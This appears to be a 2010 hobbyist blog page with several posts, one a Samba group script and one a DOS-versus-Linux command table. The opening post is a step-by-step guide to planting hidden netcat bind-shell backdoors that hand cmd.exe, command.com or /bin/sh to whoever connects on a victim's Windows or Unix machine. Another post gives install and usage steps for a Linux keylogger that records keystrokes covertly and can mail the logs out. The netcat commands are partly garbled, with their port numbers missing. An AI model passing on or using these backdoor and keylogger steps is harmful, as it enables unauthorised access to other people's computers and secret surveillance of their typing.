Friday, August 20, 2010
Windows/UNIX/LINUX : Backdoor with Netcat
In this post I will show or guide you the basic STEPS for BACKDOOR'ing (hacking) via NETCAT in many Microsoft Flavour as well as in UNIX/LINUX......
1. The Problem
Here's what this whole guide is about: getting the backdoorto
work on more than just Windows NT/2000/XP.When I first sawthe guide on breaking into NT, I hurried up and viewed it. I began reading andit said something like, "This also works with 2000 and XP!" I thoughtto myself, "Now that's not right! What about
Windows 95/98/ME and Unix!" So I began reading on onhow the backdoor worked and saw how it worked in order to set off toward mygoal of a multi-operating-system backdoor.
2. How the Backdoor Works - On Windows NT/2000/XP
For the backdoor, you'll need netcat for Windows (meansyou'll need a windows box, too) which you can get from HERE).
You should also know how tomake batch files, which you can learn on MY BLOG.
MS-DOSLINUX
First, get the netcat executable file (nc.exe) onto thetarget's
c:\windows\system32 directory. Then make a batch file withthe following command in it:
nc -L -d -p -t -e cmd.exe
Here's what that command does:
nc - tells Windows to run the nc.exe file with the followingarguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to
Put the batch file in the c:\windows\system32 directory alsoand run it.
Once that batch file is run, you can telnet or use netcat inclient mode to connect to it. Here's how to use netcat to connect to it:
In a DOS prompt, give the command
C:\WINDOWS\> nc -v
Once you connected to that port on the victim's computer,you'll have a DOS prompt that you can give any command on the victim'scomputer.
The backdoor will close whenever the victim shuts down their
computer. To get it running again, just run the batch file.
3. Getting the Backdoor to Work on Windows 95/98/ME
After reading, I thought to myself, "Now why can't Iget that to
work on 95/98/ME? Hmm... let's see here..."
Then Ithought about how the commands worked and came up with a solution.
First, put the nc.exe file in the c:\windows directory.
Why?
Explain later. Put the batch file there, too, but change thebatch file
to:
nc -L -d -p -t -e command.com
There ya go - it'll work on 95/98/ME. Here's why:
First off, you don't need to put the files in the system32directory because 95/98/ME doesn't use execute paths like NT does. If youwouldn't have put the files in System32 directory on NT, the program wouldn'thave executed the batch file because it wouldn't have been in the file path -but you don't have to worry about that in 95/98/ME. The reason why we put thefiles in the c:\windows directory on 95/98/Me is because that's where thecommand.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT/2000/XP.)That's why we ran command.com instead of cmd.exe.
4. Getting the Backdoor to Work on Unix/Linux
Ok, first off, get the unix version of netcat onto thetarget system.
Now, simply execute the following command on the followingsystem:
nc -nvv -l -p -e /bin/sh
For best results, put that command in a shell script. Also,a good idea is to run the command on more than one port to connect to, and toexecute this command to ports like mail services (port 25) and web services(port 80).
How does this work? Let's examine:
-nvv I'm not exactly sure what this does. Further researchis required...
-l stay open and listen
-p what port to listen to
-e /bin/sh spawns a shell. Or could use bash, tcsh, ksh etc.instead of sh for the shell of your choice.
So, let's see what we've learned overall:
Netcat is a usefull hackers tool that can set up backdoors.That says it all.
Thanks for reading!
Thursday, August 19, 2010
LINUX/UBUNTU : SCRIPT : SAMBA Group Add
Samba is a free software re-implementation, originally developed by Australian Andrew Tridgell, of the SMB/CIFS networking protocol. As of version 3, Samba provides file and print services for various Microsoft Windows clients and can integrate with a Windows Server domain, either as a Primary Domain Controller (PDC) or as a domain member. It can also be part of an Active Directory domain.
Samba runs on most Unix and Unix-like systems, such as Linux, Solaris, AIX and the BSD variants, including Apple's Mac OS X Server(which was added to the Mac OS X client in version 10.2). Samba isstandard on nearly all distributions of Linux and is commonly includedas a basic system service on other Unix-based operating systems as well. Samba is released under the GNU General Public License. The name Samba comes from SMB (Server Message Block), the name of the standard protocol used by the Microsoft Windows network file system.
Here is the BASH SCRIPT that can .....
Why should i must explain about the action of that script, you can also check/execute it.
#!/bin/bash
# Add the group using normal system groupadd tool.
groupadd smbtmpgrp00
thegid=`cat /etc/group | grep ^smbtmpgrp00 | cut -d ":" -f3`
# Now change the name to what we want for the MS Windows networking end
cp /etc/group /etc/group.bak
cat /etc/group.bak | sed "s/^smbtmpgrp00/$1/g" > /etc/group
rm /etc/group.bak
# Now return the GID as would normally happen.
echo $thegid
exit 0
So, what did you think about that SCRIPT....
Let me know via COMMENT
LINUX : Keylogger for LINUX
Hey guys, recently I found a keylogger for LINUX and UBUNTU, it works better that Windows keylogger due to its OpenSource :)
Check it out...
First of all, i'll explain (give a brief def. of Keylogger) something about Keylogger :-
What is Keylogger?
Keystroke logger is the practice of noting (or logging) thekeys struck on a keyboard, typically in a covert manner so that the personusing the keyboard is unaware that their actions are being monitored. There arenumerous keylogging methods, ranging from hardware- and software-based toelectromagnetic and acoustic analysis.keylogger in Linux
We have an opensource software available for Linux called lkl (Linux KeyLogger).LKL is a userspace keylogger that runs under linux–x86/arch. LKL sniffs andlogs everything passes trought the hardware keyboard port (0×60).
Download key logger here
How to Install?
Step 1
Unzip or untar the file you have downloadedStep 2
Change in to directory by typing cd lklStep 3
Give the below command./confiureThis will check all the required resurces it needs
Step 4
Type `make‘ to compile the package.Step 5
Optionally, type `make check’ to run anyself-tests that come with the package.Step 6
Type `sudo make install‘ to install theprogramsNow you are done with the installation
How to use?
You can send argument with the command lkl-h helpExample: lkl -l -k us_km -o log.file // use USA kb and put logs in‘log.file’
-l start to log the 0×60 port (keyboard)
-b debug mode
-k set a keymap file
-o set an output file
-m send logs to
-t hostname for sendmail. Default is localhost
Please comment on the same if it doesn’t works for you
Monday, August 9, 2010
DOS vs LINUX
Everyone knows that Linux is a Powerful Operating System due to his BASH and Commands...
BUT....
I know that DOS is also a Powerful Operating System...
In this POST I will show you a Command Comarison of RH- Linux and MS - DOS..
Command Comparison: |
DOS Command | UNIX or Bash Command | Action |
DIR | ls -l (or use ls -lF)(-a all files) (df -k Space remaining on filesystem) | List directory contents |
DIR *.* /o-d DIR *.* /v /os DIR /s DIR /aa | ls -tr ls -ls ls -R ls -a | List directory contents by reverse time of modification/creation. List files and size List directory/sub-directory contents recursively. List hidden files. |
TREE | ls -R | List directory recursivly |
CD | Change directory | |
MKDIR MD | mkdir | Make a new directory |
ASSIGN | ln | Create a file or directory link |
RMDIR RD | rmdir | Remove a directory |
CHDIR | pwd | Display directory location |
DEL ERASE | rm -iv | Remove a file |
RMDIR /S (NT) DELTREE (Win 95...) | rm -R | Remove all directories and files below given directory |
COPY | cp -piv | Copy a file |
XCOPY | cp -R | Copy all file of directory recursivly |
RENAME or MOVE | mv -iv | Rename/move a file |
TYPE | cat | Dump contents of a file to users screen |
MORE | more | Pipe output a single page at a time |
HELP or COMMAND /? | man | Online manuals |
CLS | clear ctrl-l | Clear screen |
EXIT EXIT0 | exit exit 0 | Exit a shell |
FIND FINDSTR | grep | Look for a word in files given in command line |
COMP | diff | Compare two files and show differences. Also see comm, cmp, mgdiff and tkdiff. |
FC | diff | Compare two files and show differences. Also see comm, cmp, mgdiff and tkdiff. |
SET | set and env | List all environment variables |
SET variable=value echo %variable% | set export variable=value echo $variable | Set environment variables Show environment variables |
ECHO text | echo text | Echo text to screen |
SET variable | setenv (for C shell) or export VAR=val (for Korn shell. Also VAR=val) | Set environment variables |
PATH PATH %PATH%;C:\DIR | echo $PATH PATH=$PATH:/dir | Display search path for executables. Set PATH environment variable. |
PROMPT $p$g | export PS1='\h(\u)\W> ' | Set user command prompt. |
DATE or TIME | date | Show date. (also set date - DOS only) |
DOSKEY /h | history | List command history |
DOSKEY NAME=command | alias NAME=command | Set command alias |
BREAK ON | trap | Trap ctrl-break / Trap signals. |
SORT | sort | Sort data alphabetically/numerically |
EDLIN | ed | Line mode editor |
EDIT filename.txt | pico, gnp, vi, xedit, xemacs,dtpad | Edit a file. The Linux editor which looks most like DOS edit is probably Pico. (Not a recomendation!) |
BACKUP files A:\ | tar -cvf /dev/fd0 files mdir, mcopy doswrite -a file (AIX only) | Save files to floppy. |
RESTORE A:\ files | tar -xvf /dev/fd0 files mdir, mcopy dosread -a file (AIX only) | Read files from floppy. |
ATTRIB [+r|-r] [+a|-a] [+s|-s] [path\file] /s | chmod | Change file permissions. DOS: +:set to -:remove r:Read only a:Archive s:System /s:recursively |
ATTRIB +h or -h | mv file .file | Change file to a hidden file - rename file with prefix "." |
PRINT | lpr | Print a file |
CALL COMMAND /C (DOS), CMD (NT) | source script (cshrc) . script (bash) sh script | Execute script from within batch shell. |
MEM | free top | Show free memory on system |
TASKLIST (WIN2K, XP) | ps -aux top | List executable name, process ID number and memory usage of active processes |
MSD | lsdev | Show system info (Command borrowed from AIX) |
SCANDISK DEFRAG C: | fsck debugfs | Check and repair hard drive file system |
CHDISK | du -s | Disk usage. |
FDISK | fdisk | Tool to partition a hard drive. |
SUBST V: C:\directory\path | mount | Mount a drive letter to a folder/directory on your hard drive. |
FORMAT | mke2fs fdformat and mformat for floppies | Format drive file system. |
VER | uname -a echo $SHELL cat /etc/issue | Operating system/shell version |
pkzip | tar and zip | Compress and uncompress files/directories. Use tar to create compilation of a directory before compressing. Linux also has compress, gzip |
HOSTNAME | hostname | Print host name of computer |
PING | ping | Send packets to a network host |
TRACERT | traceroute | Show routes and router hops to given network destination. |
IPCONFIG (NT) WINIPCFG (Win 95...) | ifconfig | Display/configure network interface |
NBTSTAT (Netbios info: -n, -c) NBTSTAT -A IP-address | nslookup host-name host host-name | Print DNS info for host. |
NBTSTAT -a hostname | nmblookup -A hostname | lookup NetBIOS names. |
ROUTE PRINT | route -n | Print routing table. |
NET HELP START | chkconfig --list |grep on | List services. |
NET STARTservice-name NET STOPservice-name | service service-name start service service-name stop | Start/stop service/daemon. |
NET SHARES | df | Show mounted shares/filesystems. |
NET SEND (NT) | smbclient -M MS-Windows-host-name talk | Send pop-up to a MS/Windows PC Send message to another Unix/Linux user. |
WIN | startx | Start X-Windows. |
REBOOT | shutdown -r now | Reboot system. |
To find out how to do something on UNIX simply type "man -ksubject_matter". This will do a key word search for all commandsdealing with the subject matter. Then use the appropriate command. Onlinemanuals are available on all the commands by typing "mancommand_name".
MS/Windows info:
Shell Descriptor/Operators: |
DOS Descriptor/Operator | UNIX or Bash Descriptor/Operator | Description |
\ | / | Directory path delimiter |
.\ | ./ | Current directory |
..\ | ../ | Parent directory |
ctrl-z | ctrl-d | End of file/close shell |
ctrl-c | ctrl-c | Interrupt/process break |
* | * | file name wild card |
? | ? | Single character wild card |
%VAR% | $VAR | Variable prefix |
%1 %2 %3 | $1 $2 $3 | First, second and third shell command line arguments. |
/ | - | Command line option flag prefix |
| | | | Pipe |
> | > | stdout redirection |
>> | >> | stdout redirection overwrite |
< | < | stdin redirection |
Shell Script Operators: |
DOS Operator | UNIX or Bash Operator | Description |
@ ECHO OFF | set +v | Set verbose mode off. -v: Echo each line of shell script as it is executed. |
% | $ | command line argument prefix. DOS: %1 Bash: $1 for firs argument. |
REM | # | Comment. (Not processed.) |
== | = | string "equal to" comparison |
!==! | != | string "not equal to" comparison |
NOT | ! | negative of test expression |
CHOICE | case | case/switch statement |
IF IF EXIST C:\filename IF NOT EXIST C:\filename | if [[ test-resulting-in-bool ]]; then ... elif ...; then ... else ... fi if [ -e /dir/filename ]; then if [ ! -e /dir/filename ]; then | if-test If file exists If file does not exist. |
GOTO ABC ... :ABC | goto ABC ... :ABC | Branch |
FOR ... IN ... DO FOR %%fff IN (C:\dir\*.*) DO echo %%fff | for ffiillee in lliisstt; do ...; done for (( expr1; expr2; expr3; )) do ...; done | For loop |
ERRORLEVEL | $? | exit status/return code |
PAUSE | sleep | sleep for specified interval |
Bash shell aliases for DOS users: |
The following are bash shell aliaseswhich can be added to the system profile or the user's personal profile ($HOME/.bashrc) to correct and help DOS users on Linux.
alias dir="echo 'Use the command: ls -lF'" alias tree="echo 'Use the command: ls -R'" alias del="echo 'Use the command: rm -iv'" alias move="echo 'Use the command: mv -iv'" alias rename="echo 'Use the command: mv -iv'" alias copy="echo 'Use the command: cp -piv'" alias type="echo 'Use the command: cat'" alias cls="echo 'Use the command: clear'" alias mem="echo 'Use the command: free'" alias ver="echo 'Use the command: uname -a'" alias A:="echo 'Use the command: mdir a:'" alias a:="A:" alias C:="echo 'No C drive in Linux. Go to your home directory with the command: cd'" alias c:="C:" |
Devices: |
DOS Device | Linux Device | Description |
NUL | /dev/null | Send into nothingness |
CON | stdin | stdin from console |
PRN LPT1 | /dev/lp0 | First printer device |
COM1 | /dev/ttyS0 | Firsst serial port |
Equivalent Linux and MS/Windows GUI Applications: |
MS/Windows Command | Linux Command | Description |
C:\WINDOWS\cmd | gnome-terminal konsole | Command Text Terminal |
C:\WINDOWS\explorer | nautilus --no-desktop | File browser |
c:\Program Files\Internet Explorer\iexplore | firefox mozilla | Web browser |
C:\WINDOWS\notepad C:\Program Files\Windows NT\Accessories\wordpad | gedit | Text editor |
C:\Program Files\Microsoft Office\Office10\winword excel powerpnt | oowriter oocalc ooimpress | MS/Office and Open Office suites (ooffice) |
C:\Program Files\Adobe\Acrobat 7.0\Reader\acrord32 | acroread | Adobe PDF viewer |
mspaint | tuxpaint xfig gimp | Graphics and painting program |
C:\Program Files\WinZip\winzip32 | file-roller | File compress / decompress / pack / unpack |
taskmgr | ksysguard qps gnome-system-monitor xosview | Process and system load monitor |
Subscribe to:
Posts (Atom)